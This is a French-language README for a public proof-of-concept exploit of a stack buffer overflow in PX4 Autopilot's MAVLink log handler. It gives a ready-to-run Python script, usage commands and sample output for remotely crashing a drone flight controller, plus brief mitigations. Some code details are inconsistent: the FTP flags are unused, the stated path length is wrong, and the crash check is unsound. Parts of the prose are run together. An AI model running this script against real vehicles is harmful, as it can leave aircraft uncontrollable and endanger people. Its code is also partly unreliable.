
Une exploitation de déni de service (DoS) à distance pour les versions ≤1.17.0-rc2 de PX4 Autopilot via un débordement de tampon basé sur la pile dans le MavlinkLogHandler.
CVE-2026-32743 est un débordement de tampon basé sur la pile dans le MavlinkLogHandler des versions ≤1.17.0-rc2 de PX4 Autopilot.
Le tampon LogEntry.filepath ne fait que 60 octets, mais sscanf() analyse les chemins de répertoire de journaux sans spécificateur de largeur.
Un attaquant disposant d'un accès au lien MAVLink peut :
/fs/microsd/log/.MAV_CMD_REQUEST_LOG_LIST.MavlinkLogHandler vulnérable copie le chemin long dans le tampon de 60 octets → débordement de pile.Corrigé dans : commit 616b25a (spécificateur de largeur ajouté à sscanf).
sequenceDiagram
participant Attacker
participant PX4 as PX4 Flight Controller
participant SD as SD Card (/fs/microsd/log/)
Attacker->>PX4: 1. Open MAVLink connection (UDP 14550)
PX4-->>Attacker: Heartbeat (system/component IDs)
Note over Attacker,PX4: Step 2: Create long directory via MAVLink FTP
Attacker->>PX4: MAVLink FTP: OpenFile( path = "/fs/microsd/log/" + "A"*70, flags=O_CREAT|O_DIRECTORY )
PX4->>SD: Create directory (named 70×'A')
SD-->>PX4: OK
Note over Attacker,PX4: Step 3: Trigger overflow by requesting log list
Attacker->>PX4: MAV_CMD_REQUEST_LOG_LIST (command 261)
PX4->>PX4: MavlinkLogHandler::list() reads log directory
PX4->>PX4: sscanf(path, "%s", LogEntry.filepath) ← NO width limit!
Note right of PX4: Buffer overflow: 70 bytes written into 60-byte buffer
PX4--xAttacker: MAVLink task crashes → no more heartbeats/commands
Note over Attacker,PX4: ✅ DoS achieved – flight controller unmanageable1.17.0-rc2 avec carte SD montée (journaux stockés dans /fs/microsd/log/).14550).pymavlink installé :
pip install pymavlink
git clone https://github.com/mbanyamer/CVE-2026-32743-PoC
cd CVE-2026-32743-PoC
python3 exploit.py <TARGET_IP> [--port <PORT>]
| Argument | Description | Défaut |
|---|---|---|
target_ip | Adresse IP du contrôleur de vol | requis |
--port | Port UDP MAVLink | 14550 |
python3 exploit.py 192.168.1.10 --port 14550
Sortie attendue (DoS réussi) :
[*] Connecting to MAVLink target: 192.168.1.10:14550
[+] Heartbeat received from system 1, component 1
[*] Creating long directory: /fs/microsd/log/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (length 80 bytes)
[+] Directory created (or already existed).
[*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST...
[*] Waiting for crash (target will stop responding)...
[+] Target unresponsive – DoS achieved!
#!/usr/bin/env python3
# Exploit Title: PX4 Autopilot MavlinkLogHandler Stack Buffer Overflow (DoS)
# CVE: CVE-2026-32743
# Date: 2026-05-08
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://px4.io/
# Software Link: https://github.com/PX4/PX4-Autopilot
# Affected: Versions 1.17.0-rc2 and below
# Tested on: PX4 v1.17.0-rc2 (Pixhawk)
# Category: DoS
# Platform: Embedded (PX4 Autopilot)
# Exploit Type: Stack-based Buffer Overflow
# CVSS: 7.5 (High)
# CWE: CWE-121
# Description: Creates an overly long directory via MAVLink FTP, then requests log list.
# Fixed in: https://github.com/PX4/PX4-Autopilot/commit/616b25a
# Usage: python3 exploit.py <target_ip> [--port <port>]
print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║
║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║
║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║
║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║
║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║
║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║
║ ║
║ [ b a n y a m e r _ s e c u r i t y ] ║
║ ║
║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║
║ ║
║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║
║ Handle : @banyamer_security ║
║ ║
║ Exploit : CVE-2026-32743 ║
║ Target : PX4 Autopilot • MAVLink • Log Handler ║
║ ║
║ Status : ACTIVE ║
║ ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")
import time
import struct
import argparse
from pymavlink import mavutil
from pymavlink.dialects.v20 import common as mavlink2
def send_ftp_command(mav, seq, payload):
msg = mav.file_transfer_protocol_encode(
target_system=mav.target_system,
target_component=mav.target_component,
payload=payload
)
mav.mav.send(msg)
def ftp_create_directory(mav, path):
O_CREAT = 0x04
O_DIRECTORY = 0x08
seq = 1
path_bytes = path.encode('utf-8') + b'\x00'
payload = struct.pack('<BBHB', 0, 0, seq, 0) + path_bytes
send_ftp_command(mav, seq, payload)
time.sleep(0.5)
def exploit(target_ip, target_port):
print(f"[*] Connecting to MAVLink target: {target_ip}:{target_port}")
master = mavutil.mavlink_connection(f"udpout:{target_ip}:{target_port}")
master.wait_heartbeat()
print(f"[+] Heartbeat received from system {master.target_system}, component {master.target_component}")
long_dir_name = "A" * 70
full_path = f"/fs/microsd/log/{long_dir_name}"
print(f"[*] Creating long directory: {full_path} (length {len(full_path)} bytes)")
try:
ftp_create_directory(master, full_path)
print("[+] Directory created (or already existed).")
except Exception as e:
print(f"[-] FTP directory creation failed: {e}")
print(" Ensure the target supports MAVLink FTP and the SD card is mounted.")
return
print("[*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST...")
master.mav.command_long_send(
master.target_system,
master.target_component,
mavlink2.MAV_CMD_REQUEST_LOG_LIST,
0,
0,
0, 0, 0, 0, 0, 0
)
print("[*] Waiting for crash (target will stop responding)...")
time.sleep(5)
try:
master.mav.heartbeat_send(mavlink2.MAV_TYPE_GCS, mavlink2.MAV_AUTOPILOT_GENERIC)
print("[-] Target still responsive – vulnerability may be patched or conditions not met.")
except Exception:
print("[+] Target unresponsive – DoS achieved!")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CVE-2026-32743 PX4 MavlinkLogHandler DoS Exploit")
parser.add_argument("target_ip", help="IP address of the target flight controller")
parser.add_argument("--port", type=int, default=14550, help="MAVLink UDP port (default: 14550)")
args = parser.parse_args()
exploit(args.target_ip, args.port)
$ python3 exploit.py 192.168.1.100
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║ [banner] ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
[*] Connecting to MAVLink target: 192.168.1.100:14550
[+] Heartbeat received from system 1, component 1
[*] Creating long directory: /fs/microsd/log/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (length 80 bytes)
[+] Directory created (or already existed).
[*] Requesting log list via MAV_CMD_REQUEST_LOG_LIST...
[*] Waiting for crash (target will stop responding)...
[+] Target unresponsive – DoS achieved!
616b25a).MAV_0_FTP sur 0 dans les paramètres./fs/microsd/log/.Mohammed Idrees Banyamer
"Silent Hunter | Shadow Presence | Digital Intel"
Cette preuve de concept (PoC) est destinée uniquement à des fins éducatives et défensives.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce logiciel.
Ce projet est sous licence MIT License – voir le fichier LICENSE pour plus de détails.
N'hésitez pas à l'utiliser, le modifier et le distribuer avec attribution.